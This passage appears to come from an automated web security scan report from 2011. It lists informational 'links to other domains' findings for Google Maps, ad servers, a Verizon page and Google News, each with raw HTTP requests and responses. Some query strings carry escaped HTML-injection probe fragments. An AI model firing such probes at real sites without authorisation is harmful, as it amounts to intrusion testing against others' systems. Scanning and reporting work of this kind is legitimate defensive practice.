GET /maps?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d0,0,7028149978956142856\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dimage\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEUQnwIwBA\\x22\\x3e\\x3cimg HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:01 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=6519d73cebd025c1:TM=1295908861:LM=1295908861:S=FXx88J_feOyYabSV; expires=Wed, 23-Jan-2013 22:41:01 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d0,0,7028149978956142856%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dimage%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEUQnwIwBA%5C%5Cx22%5C%5Cx3e%5C%5Cx3cimg=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.98. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22

The response contains the following link to another domain:

http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.99. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d

The response contains the following link to another domain:

http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1

Request

GET /maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c5d07bdbfef51812:TM=1295908902:LM=1295908902:S=vD7r0pWUMFkf-fMR; expires=Wed, 23-Jan-2013 22:41:42 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.100. http://maps.google.com/maps/place previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps/place

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x26amp;dtab\\x3d2\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dresult\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEYQqgUwBA\\x22

The response contains the following link to another domain:

http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx26amp%3Bdtab%5C%5Cx3d2%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dresult%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEYQqgUwBA%5C%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x26amp;dtab\\x3d2\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dresult\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEYQqgUwBA\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8fae084547919f5c:TM=1295908881:LM=1295908881:S=ebTjVFzd05-Cre3w; expires=Wed, 23-Jan-2013 22:41:21 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx26amp%3Bdtab%5C%5Cx3d2%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dresult%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEYQqgUwBA%5C%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.101. http://media.fastclick.net/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/pg

Issue detail

The page was loaded from a URL containing a query string:

http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=938566&t=2
https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1032669722/?label=NDXJCKy7ngEQmpS17AM&guid=ON&script=0

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />


...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1032669722/?label=NDXJCKy7ngEQmpS17AM&guid=ON&script=0"/>
</div>
...[SNIP]...

20.102. http://media.fastclick.net/w/pg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/pg

Issue detail

The page was loaded from a URL containing a query string:

http://media.fastclick.net/w/pg?cont_id=11&d=f

The response contains the following link to another domain:

http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net

Request

GET /w/pg?cont_id=11&d=f HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:48 GMT
Location: http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net">here</a>
...[SNIP]...

20.103. http://media.fastclick.net/w/win.bid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/win.bid

Issue detail

The page was loaded from a URL containing a query string:

http://media.fastclick.net/w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D

The response contains the following link to another domain:

http://yttrk.com/i.ashx?a=3&c=345&s1=SUB_ID

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

20.104. http://network4g.verizonwireless.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network4g.verizonwireless.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://network4g.verizonwireless.com/?cid=BAC-bsrsch

The response contains the following links to other domains:

http://waptag.net/ads/sites/V/verizon_4g_f/index.php
http://www.facebook.com/plugins/like.php?href=http://social.store.verizonwireless.com/456&layout=standard&show_faces=false&width=450&action=like&colorscheme=dark
http://www22.verizon.com/privacy/
https://ecache.vzw.com/imageFiles/Myacct/gn/css/globalnav.css
https://ecache.vzw.com/imageFiles/Myacct/gn/css/vzw_jquery.css
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
https://scache.vzw.com/globalnav/css/globalnav-js.css
https://scache.vzw.com/globalnav/globalnav.js
https://scache.vzw.com/scripts/accessible/mootools.js
https://scache.vzw.com/scripts/homepage/swfobject.js

Request

GET /?cid=BAC-bsrsch HTTP/1.1
Host: network4g.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.14
X-Pingback: http://network4g.verizonwireless.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 14:25:23 GMT
Content-Length: 9172
Connection: close

...<!DOCTYPE html>
<html    xmlns="http://www.w3.org/1999/xhtml"
       xmlns:og="http://opengraphprotocol.org/schema/"
       xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" dir="ltr" lang="en-US">
...[SNIP]...

   <link rel="stylesheet" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/vzw_jquery.css" />
   <link rel="stylesheet" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/globalnav.css" />
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css" />

   

   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...
<br/>
       Or can go directly to the mobile site by clicking <a href="http://waptag.net/ads/sites/V/verizon_4g_f/index.php">here</a>
...[SNIP]...
<div id="likebutton" style="visibility:hidden;top:150px;">
       <iframe src="http://www.facebook.com/plugins/like.php?href=http://social.store.verizonwireless.com/456&layout=standard&show_faces=false&width=450&action=like&colorscheme=dark" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...
ormation I've selected above. I also agree that I am at least 13 years of age. Verizon Wireless maintains high standards for the protection of privacy over the Internet. Your information will be kept <a href="http://www22.verizon.com/privacy/" target="_blank" style="color:#ffffff;">private</a>
...[SNIP]...

20.105. http://news.google.com/news/story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/story

Issue detail

The page was loaded from a URL containing a query string:

http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddy74uik5aGXiyFM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d12\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CH0QqgIwCw\\x22

The response contains the following links to other domains:

http://abcnews.go.com/Business/wireStory?id=12751095
http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000
http://allafrica.com/stories/201101242014.html
http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars
http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars
http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0
http://calgary.ctv.ca/servlet/an/local/CTVNews/20110123/detroit-shooting-110123/20110123/?hub=CalgaryHome
http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html
http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1
http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf
http://content.usatoday.com/communities/ondeadline/post/2011/01/tucson-shooting-suspect-loughner-to-be-arraigned-shortly/1
http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1
